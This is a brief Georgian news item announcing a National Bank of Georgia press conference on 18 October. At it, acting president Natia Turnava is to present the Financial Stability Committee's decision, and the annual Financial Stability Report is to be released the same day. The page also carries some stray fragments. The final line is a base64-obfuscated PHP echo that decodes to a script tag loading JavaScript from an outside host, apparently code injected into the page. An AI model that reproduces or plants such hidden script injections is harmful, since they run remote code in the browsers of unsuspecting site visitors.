celsiusi
ავერსი შნაიდერი

18 ოქტომბერს, საქართველოს ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელი, ნათია თურნავა საზოგადოებას ფინანსური სტაბილურობის კომიტეტის გადაწყვეტილებას გააცნობს. ინფორმაციას მარეგულირებელი ავრცელებს.

სებ-ის ცნობით, პრესკონფერენციაზე მედიის წარმომადგენლებს შესაძლებლობა ექნებათ, კითხვები დაუსვან ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელს.

პირდაპირი ეთერი ეროვნული ბანკის ოფიციალურ ვებგვერდსა და ფეისბუქზე -  fb.com/NationalBankofGeorgia/ 12:00 საათზე დაიწყება.

ამავე დღეს გამოქვეყნდება საქართველოს ეროვნული ბანკის ყოველწლიური გამოცემა - "ფინანსური სტაბილურობის ანგარიში".

ფინანსური სტაბილურობის კომიტეტი იკრიბება კვარტალში ერთხელ და იღებს გადაწყვეტილებას მაკროპრუდენციული პოლიტიკის შესახებ. 

190
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");